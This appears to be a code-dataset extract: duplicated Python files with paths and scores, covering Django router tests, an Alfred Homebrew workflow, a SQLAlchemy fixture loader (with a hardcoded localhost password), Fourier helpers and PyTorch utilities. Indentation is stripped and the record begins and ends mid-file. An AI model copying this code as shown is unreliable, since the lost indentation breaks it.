Newer versions of Django use URLPattern, as opposed to
RegexURLPattern.
"""
if hasattr(url_pattern, 'pattern'):
pattern = str(url_pattern.pattern)
elif hasattr(url_pattern._regex, 'pattern'):
pattern = str(url_pattern.regex.pattern)
else:
pattern = url_pattern._regex
return pattern
QS = namedtuple('Queryset', ['model'])
class A(models.Model):
name = models.CharField(max_length=255)
class B(models.Model):
name = models.CharField(max_length=255)
parent = models.ForeignKey(A, on_delete=models.CASCADE)
class C(models.Model):
name = models.CharField(max_length=255)
parent = models.ForeignKey(B, on_delete=models.CASCADE)
class AViewSet(ModelViewSet):
lookup_value_regex = '[0-9a-f]{32}'
model = A
queryset = QS(A)
class BViewSet(ModelViewSet):
model = B
queryset = QS(B)
class CViewSet(ModelViewSet):
model = C
queryset = QS(C)
class TestNestedSimpleRouter(TestCase):
def setUp(self):
self.router = SimpleRouter()
self.router.register(r'a', AViewSet)
self.a_router = NestedSimpleRouter(self.router, r'a', lookup='a')
self.a_router.register(r'b', BViewSet)
self.b_router = NestedSimpleRouter(self.a_router, r'b', lookup='b')
self.b_router.register(r'c', CViewSet)
def test_recursive_nested_simple_routers(self):
self.assertFalse(hasattr(self.router, 'parent_regex'))
urls = self.router.urls
self.assertEquals(len(urls), 2)
self.assertEquals(get_regex_pattern(urls[0]), u'^a/$')
self.assertEquals(get_regex_pattern(urls[1]), u'^a/(?P<pk>[0-9a-f]{32})/$')
self.assertEqual(self.a_router.parent_regex, u'a/(?P<a_pk>[0-9a-f]{32})/')
urls = self.a_router.urls
self.assertEquals(len(urls), 2)
self.assertEquals(get_regex_pattern(urls[0]), u'^a/(?P<a_pk>[0-9a-f]{32})/b/$')
self.assertEquals(get_regex_pattern(urls[1]), u'^a/(?P<a_pk>[0-9a-f]{32})/b/(?P<pk>[^/.]+)/$')
self.assertEqual(self.b_router.parent_regex, u'a/(?P<a_pk>[0-9a-f]{32})/b/(?P<b_pk>[^/.]+)/')
urls = self.b_router.urls
self.assertEquals(len(urls), 2)
self.assertEquals(get_regex_pattern(urls[0]), u'^a/(?P<a_pk>[0-9a-f]{32})/b/(?P<b_pk>[^/.]+)/c/$')
self.assertEquals(get_regex_pattern(urls[1]), u'^a/(?P<a_pk>[0-9a-f]{32})/b/(?P<b_pk>[^/.]+)/c/(?P<pk>[^/.]+)/$')
class TestEmptyPrefix(TestCase):
def setUp(self):
self.router = SimpleRouter()
self.router.register(r'', AViewSet)
self.a_router = NestedSimpleRouter(self.router, r'', lookup='a')
self.a_router.register(r'b', BViewSet)
def test_empty_prefix(self):
urls = self.router.urls
urls = self.a_router.urls
self.assertEquals(len(urls), 2)
self.assertEquals(get_regex_pattern(urls[0]), u'^(?P<a_pk>[0-9a-f]{32})/b/$')
self.assertEquals(get_regex_pattern(urls[1]), u'^(?P<a_pk>[0-9a-f]{32})/b/(?P<pk>[^/.]+)/$')
class TestBadLookupValue(TestCase):
def setUp(self):
self.router = SimpleRouter()
self.router.register(r'parents', AViewSet, base_name='ui-parent_1')
def test_bad_lookup(self):
with self.assertRaises(ValueError):
self.a_router = NestedSimpleRouter(self.router, r'parents', lookup='ui-parent_2')
self.a_router.register(r'child', BViewSet, base_name='ui-parent-child')
class TestRouterSettingInheritance(TestCase):
"""
Ensure that nested routers inherit the trailing_slash option from
their parent unless explicitly told not to.
note: drf transforms the boolean from the kwargs into an internal
    pattern string, so it is required to test these values instead of
the boolean.
trailing_slash=True -> '/'
trailing_slash=False -> ''
trailing_slash should
- always give priority to the value explicitly defined on the router
- if inherited, use the trailing slash exactly as set in the parent
"""
def _assertHasTrailingSlash(self, router):
self.assertEqual(router.trailing_slash, u'/', "router does not have trailing slash when it should")
self.assertTrue(pattern_from_url(router.urls[0]).endswith('/$'),
"router created url without trailing slash when it should have")
def _assertDoesNotHaveTrailingSlash(self, router):
self.assertEqual(router.trailing_slash, u'', "router has trailing slash when it should not")
self.assertFalse(pattern_from_url(router.urls[0]).endswith('/$'),
"router created url with trailing slash when it should not have")
def test_inherits_no_trailing_slash(self):
"""
Test whether the trailing_slash=False value is inherited when it
is unspecified on the nested router.
"""
router = SimpleRouter(trailing_slash=False)
router.register('a', AViewSet)
a_router = NestedSimpleRouter(router, 'a', lookup='a')
a_router.register('b', BViewSet)
self._assertDoesNotHaveTrailingSlash(a_router)
def test_inherits_trailing_slash(self):
"""
Test whether the trailing_slash=True value is inherited when it
is unspecified on the nested router.
"""
router = SimpleRouter(trailing_slash=True)
router.register('a', AViewSet)
a_router = NestedSimpleRouter(router, 'a', lookup='a')
a_router.register('b', BViewSet)
self._assertHasTrailingSlash(a_router)
def test_explicit_no_trailing_slash(self):
router = SimpleRouter(trailing_slash=True)
router.register('a', AViewSet)
a_router = NestedSimpleRouter(router, 'a', lookup='a', trailing_slash=False)
a_router.register('b', BViewSet)
self._assertDoesNotHaveTrailingSlash(a_router)
def test_explicit_trailing_slash(self):
"""
Test whether the trailing_slash=False value is properly overridden when setting
trailing_slash=True on the nested router.
"""
router = SimpleRouter(trailing_slash=False)
router.register('a', AViewSet)
a_router = NestedSimpleRouter(router, 'a', lookup='a', trailing_slash=True)
a_router.register('b', BViewSet)
self._assertHasTrailingSlash(a_router)
def test_inherits_nonstandard_trailing_slash(self):
"""
Test whether the trailing_slash attribute, when set with a custom value,
is inherited by the nested router.
"""
router = SimpleRouter()
router.trailing_slash = '/?'
router.register('a', AViewSet)
a_router = NestedSimpleRouter(router, 'a', lookup='a')
a_router.register('b', BViewSet)
self.assertEqual(a_router.trailing_slash, u'/?', "router does not have trailing slash when it should")
self.assertTrue(pattern_from_url(a_router.urls[0]).endswith('/?$'),
"router created url without trailing slash when it should have") | 0.800926 | 0.298364 |
import os
import sys
import subprocess
from workflow import Workflow3 as Workflow, MATCH_SUBSTRING
from workflow.background import run_in_background
import cask_actions
import helpers
GITHUB_SLUG = 'fniephaus/alfred-homebrew'
OPEN_HELP = 'open https://github.com/fniephaus/alfred-homebrew && exit'
def execute(wf, cmd_list):
opts = wf.settings.get('HOMEBREW_CASK_OPTS', None)
if opts:
if all(k in opts for k in ('appdir',)):
cmd_list += ['--appdir=%s' % opts['appdir']]
brew_arch = helpers.get_brew_arch(wf)
new_env = helpers.initialise_path(brew_arch)
result, err = subprocess.Popen(cmd_list,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
env=new_env).communicate()
if err:
return 'Error: %s' % err
return result
def get_all_casks():
return execute(wf, ['brew', 'search', '--cask']).splitlines()
def get_installed_casks():
return execute(wf, ['brew', 'list', '--cask']).splitlines()
def get_outdated_casks():
return execute(wf, ['brew', 'outdated', '--cask']).splitlines()
def filter_all_casks(wf, query):
formulas = wf.cached_data('cask_all_casks',
get_all_casks,
max_age=3600)
query_filter = query.split()
if len(query_filter) > 1:
return wf.filter(query_filter[1], formulas, match_on=MATCH_SUBSTRING)
return formulas
def filter_installed_casks(wf, query):
formulas = wf.cached_data('cask_installed_casks',
get_installed_casks,
max_age=3600)
query_filter = query.split()
if len(query_filter) > 1:
return wf.filter(query_filter[1], formulas, match_on=MATCH_SUBSTRING)
return formulas
def filter_outdated_casks(wf, query):
formulas = wf.cached_data('cask_outdated_casks',
get_outdated_casks,
max_age=3600)
query_filter = query.split()
if len(query_filter) > 1:
return wf.filter(query_filter[1], formulas, match_on=MATCH_SUBSTRING)
return formulas
def main(wf):
if wf.update_available:
wf.add_item('An update is available!',
autocomplete='workflow:update',
valid=False,
icon=helpers.get_icon(wf, 'cloud-download'))
find_brew = helpers.brew_installed()
if not (find_brew['INTEL'] or find_brew['ARM']):
helpers.brew_installation_instructions(wf)
else:
# extract query
query = wf.args[0] if len(wf.args) else None
if (not query and
len(wf.cached_data('cask_outdated_casks',
get_outdated_casks,
max_age=3600)) > 0):
wf.add_item('Some of your casks are outdated!',
autocomplete='outdated ',
valid=False,
icon=helpers.get_icon(wf, 'cloud-download'))
if query and query.startswith('install'):
for formula in filter_all_casks(wf, query):
wf.add_item(formula, 'Install cask',
arg='brew install --cask %s' % formula,
valid=True,
icon=helpers.get_icon(wf, 'package'))
elif query and any(query.startswith(x) for x in ['search', 'home']):
for formula in filter_all_casks(wf, query):
wf.add_item(formula, 'Open homepage',
arg='brew home %s' % formula,
valid=True,
icon=helpers.get_icon(wf, 'package'))
elif query and query.startswith('uninstall'):
for formula in filter_installed_casks(wf, query):
name = formula.split(' ')[0]
item = wf.add_item(formula, 'Uninstall cask',
arg='brew uninstall --cask %s' % name,
valid=True,
icon=helpers.get_icon(wf, 'package'))
item.add_modifier('alt', 'Uninstall and zap cask',
arg='brew uninstall --cask --zap %s' % name,
valid=True,
icon=helpers.get_icon(wf, 'package'))
elif query and query.startswith('list'):
for formula in filter_installed_casks(wf, query):
wf.add_item(formula, 'Open homepage',
arg='brew home %s' % formula,
valid=True,
icon=helpers.get_icon(wf, 'package'))
elif query and query.startswith('outdated'):
for formula in filter_outdated_casks(wf, query):
name = formula.split(' ')[0]
wf.add_item(formula, 'Upgrade cask',
arg='brew upgrade --cask %s' % name,
valid=True,
icon=helpers.get_icon(wf, 'package'))
elif query and query.startswith('config'):
helpers.edit_settings(wf)
wf.add_item('`settings.json` has been opened.',
autocomplete='',
icon=helpers.get_icon(wf, 'info'))
else:
actions = cask_actions.ACTIONS
# filter actions by query
if query:
actions = wf.filter(query, actions,
key=helpers.search_key_for_action,
match_on=MATCH_SUBSTRING)
if len(actions) > 0:
for action in actions:
wf.add_item(action['name'], action['description'],
uid=action['name'],
autocomplete=action['autocomplete'],
arg=action['arg'],
valid=action['valid'],
icon=helpers.get_icon(wf, 'chevron-right'))
else:
wf.add_item('No action found for "%s"' % query,
autocomplete='',
icon=helpers.get_icon(wf, 'info'))
if len(wf._items) == 0:
query_name = query[query.find(' ') + 1:]
wf.add_item('No formula found for "%s"' % query_name,
autocomplete='%s ' % query[:query.find(' ')],
icon=helpers.get_icon(wf, 'info'))
wf.send_feedback()
# refresh cache
cmd = ['/usr/bin/python', wf.workflowfile('cask_refresh.py')]
run_in_background('cask_refresh', cmd)
if __name__ == '__main__':
wf = Workflow(update_settings={'github_slug': GITHUB_SLUG})
sys.exit(wf.run(main)) | src/cask.py |
import os
import sys
import subprocess
from workflow import Workflow3 as Workflow, MATCH_SUBSTRING
from workflow.background import run_in_background
import cask_actions
import helpers
GITHUB_SLUG = 'fniephaus/alfred-homebrew'
OPEN_HELP = 'open https://github.com/fniephaus/alfred-homebrew && exit'
def execute(wf, cmd_list):
opts = wf.settings.get('HOMEBREW_CASK_OPTS', None)
if opts:
if all(k in opts for k in ('appdir',)):
cmd_list += ['--appdir=%s' % opts['appdir']]
brew_arch = helpers.get_brew_arch(wf)
new_env = helpers.initialise_path(brew_arch)
result, err = subprocess.Popen(cmd_list,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
env=new_env).communicate()
if err:
return 'Error: %s' % err
return result
def get_all_casks():
return execute(wf, ['brew', 'search', '--cask']).splitlines()
def get_installed_casks():
return execute(wf, ['brew', 'list', '--cask']).splitlines()
def get_outdated_casks():
return execute(wf, ['brew', 'outdated', '--cask']).splitlines()
def filter_all_casks(wf, query):
formulas = wf.cached_data('cask_all_casks',
get_all_casks,
max_age=3600)
query_filter = query.split()
if len(query_filter) > 1:
return wf.filter(query_filter[1], formulas, match_on=MATCH_SUBSTRING)
return formulas
def filter_installed_casks(wf, query):
formulas = wf.cached_data('cask_installed_casks',
get_installed_casks,
max_age=3600)
query_filter = query.split()
if len(query_filter) > 1:
return wf.filter(query_filter[1], formulas, match_on=MATCH_SUBSTRING)
return formulas
def filter_outdated_casks(wf, query):
formulas = wf.cached_data('cask_outdated_casks',
get_outdated_casks,
max_age=3600)
query_filter = query.split()
if len(query_filter) > 1:
return wf.filter(query_filter[1], formulas, match_on=MATCH_SUBSTRING)
return formulas
def main(wf):
if wf.update_available:
wf.add_item('An update is available!',
autocomplete='workflow:update',
valid=False,
icon=helpers.get_icon(wf, 'cloud-download'))
find_brew = helpers.brew_installed()
if not (find_brew['INTEL'] or find_brew['ARM']):
helpers.brew_installation_instructions(wf)
else:
# extract query
query = wf.args[0] if len(wf.args) else None
if (not query and
len(wf.cached_data('cask_outdated_casks',
get_outdated_casks,
max_age=3600)) > 0):
wf.add_item('Some of your casks are outdated!',
autocomplete='outdated ',
valid=False,
icon=helpers.get_icon(wf, 'cloud-download'))
if query and query.startswith('install'):
for formula in filter_all_casks(wf, query):
wf.add_item(formula, 'Install cask',
arg='brew install --cask %s' % formula,
valid=True,
icon=helpers.get_icon(wf, 'package'))
elif query and any(query.startswith(x) for x in ['search', 'home']):
for formula in filter_all_casks(wf, query):
wf.add_item(formula, 'Open homepage',
arg='brew home %s' % formula,
valid=True,
icon=helpers.get_icon(wf, 'package'))
elif query and query.startswith('uninstall'):
for formula in filter_installed_casks(wf, query):
name = formula.split(' ')[0]
item = wf.add_item(formula, 'Uninstall cask',
arg='brew uninstall --cask %s' % name,
valid=True,
icon=helpers.get_icon(wf, 'package'))
item.add_modifier('alt', 'Uninstall and zap cask',
arg='brew uninstall --cask --zap %s' % name,
valid=True,
icon=helpers.get_icon(wf, 'package'))
elif query and query.startswith('list'):
for formula in filter_installed_casks(wf, query):
wf.add_item(formula, 'Open homepage',
arg='brew home %s' % formula,
valid=True,
icon=helpers.get_icon(wf, 'package'))
elif query and query.startswith('outdated'):
for formula in filter_outdated_casks(wf, query):
name = formula.split(' ')[0]
wf.add_item(formula, 'Upgrade cask',
arg='brew upgrade --cask %s' % name,
valid=True,
icon=helpers.get_icon(wf, 'package'))
elif query and query.startswith('config'):
helpers.edit_settings(wf)
wf.add_item('`settings.json` has been opened.',
autocomplete='',
icon=helpers.get_icon(wf, 'info'))
else:
actions = cask_actions.ACTIONS
# filter actions by query
if query:
actions = wf.filter(query, actions,
key=helpers.search_key_for_action,
match_on=MATCH_SUBSTRING)
if len(actions) > 0:
for action in actions:
wf.add_item(action['name'], action['description'],
uid=action['name'],
autocomplete=action['autocomplete'],
arg=action['arg'],
valid=action['valid'],
icon=helpers.get_icon(wf, 'chevron-right'))
else:
wf.add_item('No action found for "%s"' % query,
autocomplete='',
icon=helpers.get_icon(wf, 'info'))
if len(wf._items) == 0:
query_name = query[query.find(' ') + 1:]
wf.add_item('No formula found for "%s"' % query_name,
autocomplete='%s ' % query[:query.find(' ')],
icon=helpers.get_icon(wf, 'info'))
wf.send_feedback()
# refresh cache
cmd = ['/usr/bin/python', wf.workflowfile('cask_refresh.py')]
run_in_background('cask_refresh', cmd)
if __name__ == '__main__':
wf = Workflow(update_settings={'github_slug': GITHUB_SLUG})
sys.exit(wf.run(main)) | 0.315314 | 0.083928 |
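A note on the `HOMEBREW_CASK_OPTS` check in `execute` above: a bare string on the right-hand side of that membership test iterates over its characters, so a one-element tuple (or a plain `in`) is needed for the intended behaviour. A minimal standard-library sketch of the difference:

opts = {'appdir': '/Applications'}
print(all(k in opts for k in ('appdir')))   # iterates 'a', 'p', 'p', 'd', 'i', 'r' -> False
print(all(k in opts for k in ('appdir',)))  # one-element tuple -> True
print('appdir' in opts)                     # simplest equivalent -> True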
import argparse
import collections
import datetime
import json
import progress.bar
import sqlalchemy as sa
import sqlalchemy.orm as orm
import _sqlalchemy.models as m
def bar(label, total):
return progress.bar.Bar(label[:32].ljust(32), max=total)
def bulk_insert(db, label, data, into):
label = f"Creating {len(data)} {label}"
pbar = bar(label, len(data))
while data:
chunk = data[:1000]
data = data[1000:]
db.execute(sa.insert(into), chunk)
db.commit()
pbar.next(len(chunk))
pbar.finish()
def reset_sequence(db, tablename):
tab = sa.table(tablename, sa.column("id"))
db.execute(
sa.select(
sa.func.setval(
f"{tablename}_id_seq",
sa.select(tab.c.id)
.order_by(tab.c.id.desc())
.limit(1)
.scalar_subquery(),
)
)
)
def load_data(filename, engine):
session_factory = orm.sessionmaker(bind=engine)
Session = orm.scoped_session(session_factory)
with Session() as db:
# first clear all the existing data
print(f"purging existing data...")
db.execute(sa.delete(m.Directors))
db.execute(sa.delete(m.Cast))
db.execute(sa.delete(m.Review))
db.execute(sa.delete(m.Movie))
db.execute(sa.delete(m.Person))
db.execute(sa.delete(m.User))
db.commit()
# read the JSON data
print("loading JSON... ", end="", flush=True)
with open(filename, "rt") as f:
records = json.load(f)
data = collections.defaultdict(list)
for rec in records:
rtype = rec["model"].split(".")[-1]
datum = rec["fields"]
if "pk" in rec:
datum["id"] = rec["pk"]
# convert datetime
if rtype == "review":
datum["creation_time"] = datetime.datetime.fromisoformat(
datum["creation_time"]
)
data[rtype].append(datum)
print("done")
with Session() as db:
# bulk create all the users
bulk_insert(db, "users", data["user"], m.User)
# bulk create all the people
bulk_insert(db, "people", data["person"], m.Person)
# bulk create all the movies
bulk_insert(db, "movies", data["movie"], m.Movie)
# bulk create all the reviews
bulk_insert(db, "reviews", data["review"], m.Review)
# bulk create all the directors
bulk_insert(db, "directors", data["directors"], m.Directors)
# bulk create all the cast
bulk_insert(db, "cast", data["cast"], m.Cast)
# reconcile the autoincrementing indexes with the actual indexes
reset_sequence(db, "cast")
reset_sequence(db, "directors")
reset_sequence(db, "movie")
reset_sequence(db, "person")
reset_sequence(db, "user")
if __name__ == "__main__":
parser = argparse.ArgumentParser(
description="Load a specific fixture, old data will be purged."
)
parser.add_argument("filename", type=str, help="The JSON dataset file")
args = parser.parse_args()
engine = sa.create_engine(
"postgresql+asyncpg://sqlalch_bench:edgedbbenchmark@localhost:15432/sqlalch_bench?async_fallback=True"
)
load_data(args.filename, engine) | _sqlalchemy/loaddata.py |
import argparse
import collections
import datetime
import json
import progress.bar
import sqlalchemy as sa
import sqlalchemy.orm as orm
import _sqlalchemy.models as m
def bar(label, total):
return progress.bar.Bar(label[:32].ljust(32), max=total)
def bulk_insert(db, label, data, into):
label = f"Creating {len(data)} {label}"
pbar = bar(label, len(data))
while data:
chunk = data[:1000]
data = data[1000:]
db.execute(sa.insert(into), chunk)
db.commit()
pbar.next(len(chunk))
pbar.finish()
def reset_sequence(db, tablename):
tab = sa.table(tablename, sa.column("id"))
db.execute(
sa.select(
sa.func.setval(
f"{tablename}_id_seq",
sa.select(tab.c.id)
.order_by(tab.c.id.desc())
.limit(1)
.scalar_subquery(),
)
)
)
def load_data(filename, engine):
session_factory = orm.sessionmaker(bind=engine)
Session = orm.scoped_session(session_factory)
with Session() as db:
# first clear all the existing data
print(f"purging existing data...")
db.execute(sa.delete(m.Directors))
db.execute(sa.delete(m.Cast))
db.execute(sa.delete(m.Review))
db.execute(sa.delete(m.Movie))
db.execute(sa.delete(m.Person))
db.execute(sa.delete(m.User))
db.commit()
# read the JSON data
print("loading JSON... ", end="", flush=True)
with open(filename, "rt") as f:
records = json.load(f)
data = collections.defaultdict(list)
for rec in records:
rtype = rec["model"].split(".")[-1]
datum = rec["fields"]
if "pk" in rec:
datum["id"] = rec["pk"]
# convert datetime
if rtype == "review":
datum["creation_time"] = datetime.datetime.fromisoformat(
datum["creation_time"]
)
data[rtype].append(datum)
print("done")
with Session() as db:
# bulk create all the users
bulk_insert(db, "users", data["user"], m.User)
# bulk create all the people
bulk_insert(db, "people", data["person"], m.Person)
# bulk create all the movies
bulk_insert(db, "movies", data["movie"], m.Movie)
# bulk create all the reviews
bulk_insert(db, "reviews", data["review"], m.Review)
# bulk create all the directors
bulk_insert(db, "directors", data["directors"], m.Directors)
# bulk create all the cast
bulk_insert(db, "cast", data["cast"], m.Cast)
# reconcile the autoincrementing indexes with the actual indexes
reset_sequence(db, "cast")
reset_sequence(db, "directors")
reset_sequence(db, "movie")
reset_sequence(db, "person")
reset_sequence(db, "user")
if __name__ == "__main__":
parser = argparse.ArgumentParser(
description="Load a specific fixture, old data will be purged."
)
parser.add_argument("filename", type=str, help="The JSON dataset file")
args = parser.parse_args()
engine = sa.create_engine(
"postgresql+asyncpg://sqlalch_bench:edgedbbenchmark@localhost:15432/sqlalch_bench?async_fallback=True"
)
load_data(args.filename, engine) | 0.350421 | 0.241165 |
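The chunked bulk-insert pattern in `bulk_insert` above can be sketched against an in-memory SQLite database; the table, column names, and row contents are made up, and only SQLAlchemy 1.4+ is assumed.

import sqlalchemy as sa

metadata = sa.MetaData()
users = sa.Table(
    "users", metadata,
    sa.Column("id", sa.Integer, primary_key=True),
    sa.Column("name", sa.String),
)
engine = sa.create_engine("sqlite:///:memory:")
metadata.create_all(engine)
rows = [{"name": "user-%d" % i} for i in range(2500)]
with engine.begin() as conn:
    while rows:
        chunk, rows = rows[:1000], rows[1000:]
        conn.execute(sa.insert(users), chunk)  # one executemany per 1000-row chunk
with engine.connect() as conn:
    print(conn.execute(sa.select(sa.func.count()).select_from(users)).scalar())  # 2500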
from __future__ import division
import numpy as np
#==============================================================================
# The hat function
#==============================================================================
def hat(x):
return -npHeaviside(x) * (-np.pi+x)/np.pi + npHeaviside(-x) * (np.pi+x)/np.pi
#==============================================================================
# The step function
#==============================================================================
def step(x):
return npHeaviside(x) - npHeaviside(-1*x)
#==============================================================================
# The sawtooth function
#==============================================================================
def saw(x):
return x/np.pi
def npHeaviside(x):
"""
numpy compatible implementation of heaviside function
:param x: ndarray
:return: ndarray
"""
return np.piecewise(x,
[x<0,
x==0,
x>0],
[lambda arg: 0.0,
lambda arg: 0.5,
lambda arg: 1.0])
def npDirac(x, h):
"""
numpy-compatible implementation of the Dirac delta. This implementation represents a discrete version of the
Dirac delta with width h and height 1/h; the area under it is equal to 1.
:param x: ndarray, evaluation point
:param h: width of dirac
:return: ndarray
"""
return npHeaviside(x)*npHeaviside(h-x)*1.0/h
def parser(fun_str):
from sympy import sympify, lambdify
from sympy.abc import x
fun_sym = sympify(fun_str)
fun_lam = lambdify(x, fun_sym,['numpy',
{"Heaviside": npHeaviside},
{"Dirac": npDirac}])
return fun_lam
def number_parser(number_str):
from sympy import sympify
number_sym = sympify(number_str)
return float(number_sym)
def coeff(f, start, end, N):
"""
This function computes the coefficients of the Fourier series representation
of the function f, assumed periodic with period T = end - start, up to
degree N.
"""
return coeff_fft(f, start, end, N)
def coeff_fft(f, start, end, N):
"""
computes the fourier coefficients using fft
:param f:
:param start:
:param end:
:param N:
:return:
"""
M = 4*N+1000+1
x = np.linspace(start, end, M, endpoint=False)
u0 = f(x)
c = np.fft.rfft(u0) / M
a = 2 * np.real(c)
b = -2 * np.imag(c)
a[0] /= 2
return [a[0:N+1], b[0:N+1]]
def fourier_series(a, b, N, T, x):
"""
This function evaluates the fourier series of degree N with the coefficient
vectors a and b and the period length T at the points in the array x.
:param a: cosine (even) coefficients
:param b: sine (odd) coefficients
:param N: degree of fourier series
:param T: period length
:param x: sample points
:return: fourier series evaluated at sample points
"""
# numpy matrix version of code below
a = a[:N+1]
b = b[:N+1]
"""
y = np.zeros(x.shape)
for k in range(N+1):
kk = k * 2 * np.pi / T
y += (b[k] * np.sin(kk*x) + a[k] * np.cos(kk*x))
"""
k = np.arange(N+1)
kk = k * 2 * np.pi / T
y = np.sum(b * np.sin(np.outer(x, kk)) + a * np.cos(np.outer(x, kk)), axis=1)
return y | Math_Apps/Fourier_series_approximation/fourier_functions.py | from __future__ import division
import numpy as np
#==============================================================================
# The hat function
#==============================================================================
def hat(x):
return -npHeaviside(x) * (-np.pi+x)/np.pi + npHeaviside(-x) * (np.pi+x)/np.pi
#==============================================================================
# The step function
#==============================================================================
def step(x):
return npHeaviside(x) - npHeaviside(-1*x)
#==============================================================================
# The sawtooth function
#==============================================================================
def saw(x):
return x/np.pi
def npHeaviside(x):
"""
numpy compatible implementation of heaviside function
:param x: ndarray
:return: ndarray
"""
return np.piecewise(x,
[x<0,
x==0,
x>0],
[lambda arg: 0.0,
lambda arg: 0.5,
lambda arg: 1.0])
def npDirac(x, h):
"""
numpy-compatible implementation of the Dirac delta. This implementation represents a discrete version of the
Dirac delta with width h and height 1/h; the area under it is equal to 1.
:param x: ndarray, evaluation point
:param h: width of dirac
:return: ndarray
"""
return npHeaviside(x)*npHeaviside(h-x)*1.0/h
def parser(fun_str):
from sympy import sympify, lambdify
from sympy.abc import x
fun_sym = sympify(fun_str)
fun_lam = lambdify(x, fun_sym,['numpy',
{"Heaviside": npHeaviside},
{"Dirac": npDirac}])
return fun_lam
def number_parser(number_str):
from sympy import sympify
number_sym = sympify(number_str)
return float(number_sym)
def coeff(f, start, end, N):
"""
This function computes the coefficients of the Fourier series representation
of the function f, assumed periodic with period T = end - start, up to
degree N.
"""
return coeff_fft(f, start, end, N)
def coeff_fft(f, start, end, N):
"""
computes the fourier coefficients using fft
:param f:
:param start:
:param end:
:param N:
:return:
"""
M = 4*N+1000+1
x = np.linspace(start, end, M, endpoint=False)
u0 = f(x)
c = np.fft.rfft(u0) / M
a = 2 * np.real(c)
b = -2 * np.imag(c)
a[0] /= 2
return [a[0:N+1], b[0:N+1]]
def fourier_series(a, b, N, T, x):
"""
This function evaluates the fourier series of degree N with the coefficient
vectors a and b and the period length T at the points in the array x.
:param a: cosine (even) coefficients
:param b: sine (odd) coefficients
:param N: degree of fourier series
:param T: period length
:param x: sample points
:return: fourier series evaluated at sample points
"""
# numpy matrix version of code below
a = a[:N+1]
b = b[:N+1]
"""
y = np.zeros(x.shape)
for k in range(N+1):
kk = k * 2 * np.pi / T
y += (b[k] * np.sin(kk*x) + a[k] * np.cos(kk*x))
"""
k = np.arange(N+1)
kk = k * 2 * np.pi / T
y = np.sum(b * np.sin(np.outer(x, kk)) + a * np.cos(np.outer(x, kk)), axis=1)
return y | 0.896597 | 0.544135 |
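As a quick self-check of the rfft-based recovery in `coeff_fft`, a signal whose coefficients are known in advance can be reconstructed; only numpy is assumed, and the interval starts at 0 so no phase offset enters.

import numpy as np

M = 1024
x = np.linspace(0, 2 * np.pi, M, endpoint=False)
u = 0.5 + 2.0 * np.cos(x) + 3.0 * np.sin(2 * x)  # a0=0.5, a1=2.0, b2=3.0 by construction
c = np.fft.rfft(u) / M
a, b = 2 * np.real(c), -2 * np.imag(c)
a[0] /= 2
print(np.round(a[0], 6), np.round(a[1], 6), np.round(b[2], 6))  # 0.5 2.0 3.0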
import sys
import hydra
import torch
from omegaconf.listconfig import ListConfig
import logging
from pathlib import Path
log = logging.getLogger(__name__)
# https://github.com/pytorch/examples/blob/8df8e747857261ea481e0b2492413d52bf7cc3a8/imagenet/main.py#L363
class AverageMeter(object):
"""Computes and stores the average and current value"""
def __init__(self, name, fmt=':f'):
self.name = name
self.fmt = fmt
self.reset()
def reset(self):
self.val = 0
self.avg = 0
self.sum = 0
self.count = 0
def update(self, val, n=1):
self.val = val
self.sum += val * n
self.count += n
self.avg = self.sum / self.count
def __str__(self):
fmtstr = '{name} {val' + self.fmt + '} ({avg' + self.fmt + '})'
return fmtstr.format(**self.__dict__)
class RedirectOut():
def __init__(self, out):
super().__init__()
self.out = out
self.original = sys.stdout
def __enter__(self):
self.__fd = open(self.out, 'w')
sys.stdout = self.__fd
def __exit__(self, type, value, traceback):
sys.stdout = self.original
self.__fd.close()
def instantiate_augmenters(augmentation_list):
augmentation_methods = []
for augmentation in augmentation_list:
method = list(augmentation)[0]
params = dict(augmentation[method])
if method == 'Sometimes':
params["then_list"] = instantiate_augmenters(params["then_list"])
for k, v in params.items():
if isinstance(v, (list, ListConfig)):
params[k] = tuple(v)
m = hydra.utils.get_method(
f"imgaug.augmenters.{method}")(**params)
augmentation_methods.append(m)
log.debug(
f"Register imgaug.augmenters.{method} as augmentation method")
return augmentation_methods
# https://discuss.pytorch.org/t/access-att-of-model-wrapped-within-torch-nn-dataparallel-maximum-recursion-depth-exceeded/46975/2
class CustomDataParallel(torch.nn.DataParallel):
def __getattr__(self, name):
try:
return super().__getattr__(name)
except AttributeError:
return getattr(self.module, name)
def load_model(model, optimizer, scheduler, path, resume=False):
path = Path(path)
if not path.exists():
log.warning(f"Model path {path} does not exists!")
return 1
checkpoint = torch.load(path)
epoch = checkpoint["epoch"] if resume else 0
state_dict_ = checkpoint['state_dict']
state_dict = {}
# convert data_parallel state dict keys back to plain model keys
for k in state_dict_:
if k.startswith('module') and not k.startswith('module_list'):
state_dict[k[7:]] = state_dict_[k]
else:
state_dict[k] = state_dict_[k]
model_state_dict = model.state_dict()
for k in state_dict:
if k in model_state_dict:
if state_dict[k].shape != model_state_dict[k].shape:
log.warning(
f"skip parameter {k} because of shape mismatch")
state_dict[k] = model_state_dict[k]
else:
log.info(f"drop parameter {k}")
for k in model_state_dict:
if k not in state_dict:
log.warning(f"no parameter {k} available")
state_dict[k] = model_state_dict[k]
model.load_state_dict(state_dict, strict=False)
log.info(f"restore pretrained weights")
if resume and 'optimizer' in checkpoint and optimizer is not None:
log.info(f"restore optimizer state at epoch {epoch}")
optimizer.load_state_dict(checkpoint['optimizer'])
if 'scheduler' in checkpoint and scheduler is not None:
log.info("restore scheduler state")
scheduler.load_state_dict(checkpoint['scheduler'])
return (epoch + 1) if resume else epoch
def save_model(model, path, epoch, optimizer=None, scheduler=None):
if isinstance(model, torch.nn.DataParallel):
state_dict = model.module.state_dict()
else:
state_dict = model.state_dict()
data = {
'epoch': epoch,
'state_dict': state_dict
}
if optimizer is not None:
data["optimizer"] = optimizer.state_dict()
if scheduler is not None:
data["scheduler"] = scheduler.state_dict()
torch.save(data, path) | utils/helper.py | import sys
import hydra
import torch
from omegaconf.listconfig import ListConfig
import logging
from pathlib import Path
log = logging.getLogger(__name__)
# https://github.com/pytorch/examples/blob/8df8e747857261ea481e0b2492413d52bf7cc3a8/imagenet/main.py#L363
class AverageMeter(object):
"""Computes and stores the average and current value"""
def __init__(self, name, fmt=':f'):
self.name = name
self.fmt = fmt
self.reset()
def reset(self):
self.val = 0
self.avg = 0
self.sum = 0
self.count = 0
def update(self, val, n=1):
self.val = val
self.sum += val * n
self.count += n
self.avg = self.sum / self.count
def __str__(self):
